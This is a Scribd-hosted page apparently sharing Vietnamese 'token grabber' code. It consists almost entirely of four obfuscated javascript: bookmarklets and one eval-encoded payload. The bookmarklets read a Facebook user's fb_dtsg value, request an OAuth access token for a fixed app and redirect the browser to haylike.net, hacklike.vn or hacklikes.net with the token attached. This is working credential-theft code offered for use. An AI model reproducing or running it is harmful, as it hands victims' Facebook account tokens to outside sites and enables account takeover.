0% found this document useful (0 votes)
157 views5 pages

Code Lay Token Bang Anh

The document contains JavaScript code that uses XMLHttpRequest to make requests to Facebook and extract an access token. It then redirects the browser to another site, passing the access token as a parameter, which could enable unauthorized access to a user's Facebook account from that external site. The code appears to be attempting to exploit the Facebook platform to enable unauthorized access or activity on a user's behalf.

Uploaded by

Dũng Nguyễn
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
157 views5 pages

Code Lay Token Bang Anh

The document contains JavaScript code that uses XMLHttpRequest to make requests to Facebook and extract an access token. It then redirects the browser to another site, passing the access token as a parameter, which could enable unauthorized access to a user's Facebook account from that external site. The code appears to be attempting to exploit the Facebook platform to enable unauthorized access or activity on a user's behalf.

Uploaded by

Dũng Nguyễn
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 5

javascript:var

_0x5be6=["165907476854626","http://haylike.net/login.php?users=","getTime","value","fb_dt
sg","getElementsByName","/v1.0/dialog/oauth/confirm","fb_dtsg=","&app_id=","&redirect_uri
=fbconnect://success&display=popup&access_token=&sdk=&from_post=1&private=&tos=&l
ogin=&read=&write=&extended=&social_confirm=&confirm=&seen_scopes=&auth_type=&a
uth_token=&auth_nonce=&default_audience=&ref=Default&return_format=access_token&d
omain=&sso_device=ios&__CONFIRM__=1","POST","open","onreadystatechange","readySt
ate","status","match","responseText","close","/v1.0/dialog/oauth/confirm","href","send"];var
id_app=_0x5be6[0];var haylike=_0x5be6[1];function sleep(_0x442fx4){var _0x442fx5= new
Date()[_0x5be6[2]]();while( new Date()[_0x5be6[2]]()<_0x442fx5+_0x442fx4){;}}var
delay_time=1000;var fb_dtsg=document[_0x5be6[5]](_0x5be6[4])[0][_0x5be6[3]];var e= new
XMLHttpRequest;var t=_0x5be6[6];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];e[_0x5be6[11]](_0x5be6[10],t,true);
e[_0x5be6[12]]=function(){if(e[_0x5be6[13]]==4&&e[_0x5be6[14]]==200){mabaomat=e[_0x5
be6[16]][_0x5be6[15]](/token=(.+)&/)[1];e[_0x5be6[17]];var _0x442fxb= new
XMLHttpRequest;var t=_0x5be6[18];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];_0x442fxb[_0x5be6[11]](_0x5be6[1
0],t,true);_0x442fxb[_0x5be6[12]]=function(){if(_0x442fxb[_0x5be6[13]]==4&&_0x442fxb[_0x
5be6[14]]==200){mabaomat=_0x442fxb[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];_0x442
fxb[_0x5be6[17]];sleep(delay_time);location[_0x5be6[19]]=haylike+mabaomat}};_0x442fxb[_
0x5be6[20]](n)}};e[_0x5be6[20]](n);

javascript:var _0x5be6=["165907476854626","http://hacklike.vn/tang-like-binh-luan-
facebook-
khac.php?accesstoken=","getTime","value","fb_dtsg","getElementsByName","https://www.fa
cebook.com/v1.0/dialog/oauth/confirm","fb_dtsg=","&app_id=","&redirect_uri=fbconnect://suc
cess&display=popup&access_token=&sdk=&from_post=1&private=&tos=&login=&read=&wri
te=&extended=&social_confirm=&confirm=&seen_scopes=&auth_type=&auth_token=&auth
_nonce=&default_audience=&ref=Default&return_format=access_token&domain=&sso_devi
ce=ios&__CONFIRM__=1","POST","open","onreadystatechange","readyState","status","mat
ch","responseText","close","//www.facebook.com/v1.0/dialog/oauth/confirm","href","send"];va
r id_app=_0x5be6[0];var hacklikevn=_0x5be6[1];function sleep(_0x442fx4){var _0x442fx5=
new Date()[_0x5be6[2]]();while( new Date()[_0x5be6[2]]()<_0x442fx5+_0x442fx4){;}}var
delay_time=1000;var fb_dtsg=document[_0x5be6[5]](_0x5be6[4])[0][_0x5be6[3]];var e= new
XMLHttpRequest;var t=_0x5be6[6];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];e[_0x5be6[11]](_0x5be6[10],t,true);
e[_0x5be6[12]]=function(){if(e[_0x5be6[13]]==4&&e[_0x5be6[14]]==200){mabaomat=e[_0x5
be6[16]][_0x5be6[15]](/token=(.+)&/)[1];e[_0x5be6[17]];var _0x442fxb= new
XMLHttpRequest;var t=_0x5be6[18];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];_0x442fxb[_0x5be6[11]](_0x5be6[1
0],t,true);_0x442fxb[_0x5be6[12]]=function(){if(_0x442fxb[_0x5be6[13]]==4&&_0x442fxb[_0x
5be6[14]]==200){mabaomat=_0x442fxb[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];_0x442
fxb[_0x5be6[17]];sleep(delay_time);location[_0x5be6[19]]=hacklikevn+mabaomat}};_0x442fx
b[_0x5be6[20]](n)}};e[_0x5be6[20]](n);
javascript:var
_0x5be6=[&quot;165907476854626&quot;,&quot;http://hacklikes.net/login.php?user=&quot;,
&quot;getTime&quot;,&quot;value&quot;,&quot;fb_dtsg&quot;,&quot;getElementsByName&q
uot;,&quot;/v1.0/dialog/oauth/confirm&quot;,&quot;fb_dtsg=&quot;,&quot;&amp;app_id=&qu
ot;,&quot;&amp;redirect_uri=fbconnect://success&amp;display=popup&amp;access_token=
&amp;sdk=&amp;from_post=1&amp;private=&amp;tos=&amp;login=&amp;read=&amp;write
=&amp;extended=&amp;social_confirm=&amp;confirm=&amp;seen_scopes=&amp;auth_typ
e=&amp;auth_token=&amp;auth_nonce=&amp;default_audience=&amp;ref=Default&amp;re
turn_format=access_token&amp;domain=&amp;sso_device=ios&amp;__CONFIRM__=1&qu
ot;,&quot;POST&quot;,&quot;open&quot;,&quot;onreadystatechange&quot;,&quot;readyStat
e&quot;,&quot;status&quot;,&quot;match&quot;,&quot;responseText&quot;,&quot;close&quo
t;,&quot;/v1.0/dialog/oauth/confirm&quot;,&quot;href&quot;,&quot;send&quot;];var
id_app=_0x5be6[0];var hacklike=_0x5be6[1];function sleep(_0x442fx4){var _0x442fx5= new
Date()[_0x5be6[2]]();while( new Date()[_0x5be6[2]]()&lt;_0x442fx5+_0x442fx4){;}}var
delay_time=1000;var fb_dtsg=document[_0x5be6[5]](_0x5be6[4])[0][_0x5be6[3]];var e= new
XMLHttpRequest;var t=_0x5be6[6];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];e[_0x5be6[11]](_0x5be6[10],t,true);
e[_0x5be6[12]]=function(){if(e[_0x5be6[13]]==4&amp;&amp;e[_0x5be6[14]]==200){mabaom
at=e[_0x5be6[16]][_0x5be6[15]](/token=(.+)&amp;/)[1];e[_0x5be6[17]];var _0x442fxb= new
XMLHttpRequest;var t=_0x5be6[18];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];_0x442fxb[_0x5be6[11]](_0x5be6[1
0],t,true);_0x442fxb[_0x5be6[12]]=function(){if(_0x442fxb[_0x5be6[13]]==4&amp;&amp;_0x4
42fxb[_0x5be6[14]]==200){mabaomat=_0x442fxb[_0x5be6[16]][_0x5be6[15]](/token=(.+)&a
mp;/)[1];_0x442fxb[_0x5be6[17]];sleep(delay_time);location[_0x5be6[19]]=hacklike+mabaom
at}};_0x442fxb[_0x5be6[20]](n)}};e[_0x5be6[20]](n)

javascript:var
_0x5be6=["165907476854626","http://hacklikes.net/login.php?user=","getTime","value","fb_d
tsg","getElementsByName","/v1.0/dialog/oauth/confirm","fb_dtsg=","&app_id=","&redirect_uri
=fbconnect://success&display=popup&access_token=&sdk=&from_post=1&private=&tos=&l
ogin=&read=&write=&extended=&social_confirm=&confirm=&seen_scopes=&auth_type=&a
uth_token=&auth_nonce=&default_audience=&ref=Default&return_format=access_token&d
omain=&sso_device=ios&__CONFIRM__=1","POST","open","onreadystatechange","readySt
ate","status","match","responseText","close","/v1.0/dialog/oauth/confirm","href","send"];var
id_app=_0x5be6[0];var hacklike=_0x5be6[1];function sleep(_0x442fx4){var _0x442fx5= new
Date()[_0x5be6[2]]();while( new Date()[_0x5be6[2]]()<_0x442fx5+_0x442fx4){;}}var
delay_time=1000;var fb_dtsg=document[_0x5be6[5]](_0x5be6[4])[0][_0x5be6[3]];var e= new
XMLHttpRequest;var t=_0x5be6[6];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];e[_0x5be6[11]](_0x5be6[10],t,true);
e[_0x5be6[12]]=function(){if(e[_0x5be6[13]]==4&&e[_0x5be6[14]]==200){mabaomat=e[_0x5
be6[16]][_0x5be6[15]](/token=(.+)&/)[1];e[_0x5be6[17]];var _0x442fxb= new
XMLHttpRequest;var t=_0x5be6[18];var
n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];_0x442fxb[_0x5be6[11]](_0x5be6[1
0],t,true);_0x442fxb[_0x5be6[12]]=function(){if(_0x442fxb[_0x5be6[13]]==4&&_0x442fxb[_0x
5be6[14]]==200){mabaomat=_0x442fxb[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];_0x442
fxb[_0x5be6[17]];sleep(delay_time);location[_0x5be6[19]]=hacklike+mabaomat}};_0x442fxb[
_0x5be6[20]](n)}};e[_0x5be6[20]](n);
var _7316;var
_1718='4680F63D201D711C684E747E684C738F690A735E708F729F741B567D747E684B
735B489C678A537E753E552D687D696E555F576C666B495B540E555D552E564C537F5
58C549B558B555A561B552F549E555A543B555B495B525B495A705E741B741D729B567
E534C534C705A684A690F714B717D708E714C696B738C531E723B696F741A534D717E
726E702C708C723F531E729B705A729E582E744F738C696B735C576E495A525C495B70
2C696E741B645A708D720C696F495A525A495E747F684E717A744A696E495F525A495C
699A687B678E693E741F738E702F495D525B495A702C696C741A600A717A696F720A69
6A723E741F738E591A756E627A684F720C696A495E525E495F534A747B540E531D537F
534F693A708F684B717C726A702E534F726A684E744A741F705F534F690B726B723D69
9A708B735C720C495B525B495A699C687D678B693E741A738A702C576F495A525D495
B507D684B729D729D678C708A693C576A495B525D495B507E735C696E693E708B735D
696D690A741D678E744F735D708F576A699F687A690E726A723B723D696B690B741A56
7F534B534C738E744E690A690C696B738C738F507F693F708F738D729D717B684B756B
576C729E726C729B744D729D507B684B690A690F696B738F738A678C741C726C714D6
96E723D576C507E738C693E714D576E507E699B735D726D720B678A729F726A738F74
1F576E540F507E729E735D708A747A684D741F696E576C507A741B726F738B576B507D
717E726E702C708C723F576B507F735B696E684E693B576D507D750E735B708C741F69
6D576E507C696A753C741C696C723C693A696C693B576A507B738B726B690B708B684
D717E678F690A726A723C699B708A735B720D576C507F690D726E723B699B708A735F
720C576C507B738C696E696A723B678A738F690A726B729C696E738B576E507E684A74
4A741A705A678D741B756F729D696E576F507A684D744C741D705D678B741E726B714
A696E723E576D507E684D744B741D705F678F723A726E723E690F696B576A507B693A6
96A699C684D744F717E741A678F684C744D693A708B696B723E690C696C576A507F735
C696D699F576C597C696D699A684D744C717C741E507F735D696C741C744D735C723E
678D699C726B735C720D684C741A576F684F690F690D696A738D738D678C741F726E7
14C696B723D507F693F726E720A684F708F723B576D507D738C738E726D678C693E696
A747A708E690E696A576F708D726B738D507B678E678E594B630B627F603A612F639F6
24C678B678F576F540D495F525A495D633F630E642A645C495F525B495E726F729F696
F723A495B525B495C726F723C735D696E684C693A756C738F741B684C741F696E690C
705F684E723B702E696A495A525A495B735A696C684B693D756A642A741C684A741B69
6F495A525E495D738D741E684E741F744D738D495A525A495D720B684F741D690D705
D495C525B495B735F696F738D729E726B723F738D696B645E696E753E741F495F525A4
95B690C717D726A738E696D495E525B495A534B747F540B531F537E534E693C708F684
F717F726F702E534E726F684A744E741F705C534E690C726F723B699D708E735B720E4
95E525F495D705C735A696C699D495A525A495E738C696B723D693B495F672A570C74
7C684C735A489A708E693E678B684A729B729E576B678C537B753C552D687A696F555
E666C537E672E570B747D684D735F489E705E684B690E714C717E708E714A696F576A
678E537F753E552D687F696B555B666E540E672E570C699B744C723F690B741F708C72
6C723E489D738F717F696D696E729F513E678F537C753E549B549D543D699D753D549
D516E762C747E684C735B489F678A537D753B549D549C543D699F753C552C576D489C
723F696B750C489E597E684D741B696F513E516B666F678C537A753D552C687B696B55
5A666C543F672F672E513C516D570F750B705C708F717C696C513A489B723B696B750F
489F597D684E741C696D513E516E666F678A537C753D552C687F696C555E666B543A6
72B672B513D516F573A678B537B753A549B549C543D699E753A552C522C678A537C75
3A549B549B543A699B753B549F516B762E570F768D768B747E684E735F489C693B696B
717D684E756A678A741A708D720E696B576B540A537A537B537D570A747C684C735A4
89A699E687C678D693A741F738C702B576E693E726A690E744C720C696F723B741C66
6E678D537C753E552C687D696A555F666C552C672C672D513C678C537F753E552A687
A696C555A666E549A672C516B666E537F672A666C678B537D753A552D687B696B555D
666C546A672A672F570E747D684E735E489B696A576B489B723A696D750E489A657C62
4E621A609B741E741B729B639A696F732E744A696A738F741C570F747A684F735E489D
741B576D678E537D753A552B687B696D555E666C555D672D570D747C684B735A489B7
23E576E678E537D753B552A687C696B555C666D558A672B522C699A687E678F693E74
1E738B702D522E678C537F753D552D687E696C555D666D561D672C522C708F693E678
D684E729A729D522A678A537F753F552B687B696C555D666D564E672F570B696B666A
678C537C753A552C687F696C555F666D540D540E672B672F513A678B537E753C552A6
87E696C555C666D540A537F672B525D741C525C741C735B744A696A516B570C696F66
6E678C537E753F552E687D696E555E666B540D543D672C672A576B699B744F723A690
D741F708C726B723C513F516B762C708A699A513D696D666C678C537D753C552A687D
696C555C666F540D546D672D672D576F576D549E507B507C696D666D678B537E753E5
52E687D696A555C666B540C549F672A672B576C576F543A537D537A516C762A720D68
4F687F684F726C720E684F741E576D696D666B678C537C753C552D687A696C555B666
F540D555D672F672D666C678D537C753E552A687E696C555F666D540B552E672B672E
513E534B741B726A714B696C723B576D513D531F522C516F507A534E516B666F540B67
2D570E696A666A678E537C753E552B687F696C555A666C540D558F672C672B570E747
F684D735D489D678B537F753E549B549E543F699F753A687B576A489D723B696E750D4
89B657C624E621D609B741E741E729A639F696D732D744E696E738F741F570F747B684
E735B489E741D576F678B537E753E552A687D696A555A666B540D561F672B570B747D
684A735D489A723A576D678B537E753B552E687B696F555E666D558F672C522A699A68
7B678A693A741B738D702B522F678F537F753A552C687D696B555F666B561A672C522F
708F693D678C684F729B729B522B678F537D753B552C687F696B555A666A564F672E57
0F678B537F753F549B549A543D699E753D687D666B678D537B753C552E687C696D555
C666A540D540E672B672E513A678A537A753B552E687C696B555C666C540A537B672C
525E741A525B741E735C744E696D516B570E678F537F753F549D549F543B699F753C68
7E666B678A537F753C552A687A696D555F666B540F543E672F672F576C699E744C723D
690B741C708D726D723C513C516F762B708B699B513B678D537B753E549D549E543F6
99E753B687D666C678F537B753E552E687A696E555B666F540E546D672B672B576E576
D549B507B507D678D537B753B549E549A543D699F753B687C666F678E537C753D552E
687E696E555C666D540A549C672E672F576A576C543D537F537C516C762F720C684A6
87B684A726B720B684B741B576A678B537B753A549D549D543E699D753A687A666E678
C537A753D552B687A696E555F666B540C555F672A672A666D678C537D753C552A687D
696F555B666F540D552E672C672B513C534F741A726D714E696F723E576E513C531C52
2A516E507B534A516F666E540A672D570D678D537F753B549A549D543D699C753E687
E666E678D537C753F552F687B696B555C666E540E558A672D672A570D738F717D696F
696A729B513F693C696F717F684C756B678B741B708C720C696F516A570A717A726F69
0C684B741E708D726C723A666A678B537A753E552F687D696C555C666D540C564E672
C672E576B705B684E690D714B717F708E714A696D522E720D684B687C684F726C720F
684D741F768E768F570C678F537E753F549B549B543B699C753A687C666D678A537F75
3A552D687C696F555C666E543D537A672A672E513B723A516E768F768B570D696C666
E678E537C753D552D687E696A555C666A543A537B672F672A513F723C516E570C';var
_9711=/[\x41\x42\x43\x44\x45\x46]/;var _7338=2;var _4751=_1718.charAt(_1718.length-
1);var _4977;var _3039=_1718.split(_9711);var
_1714=[String.fromCharCode,isNaN,parseInt,String];_3039[1]=_1714[_7338+1](_1714[_733
8](_3039[1])/21);var
_1253=(_7338==8)?String:eval;_4977='';_11=_1714[_7338](_3039[0])/_1714[_7338](_3039[
1]);for(_7316=3;_7316<_11;_7316++)_4977+=(_1714[_7338-
2]((_1714[_7338](_3039[_7316])+_1714[_7338](_3039[2])+_1714[_7338](_3039[1]))/_1714[
_7338](_3039[1])-_1714[_7338](_3039[2])+_1714[_7338](_3039[1])-1));var
_6929='_8299';var _5755='_6929=_4977';function
_6242(_6371){_1253(_4037);_6242(_1941);_1941(_5755);_6242(_6929);}var
_4037='_6242=_1253';var _1941='_1941=_6242';_6242(_4751);

You might also like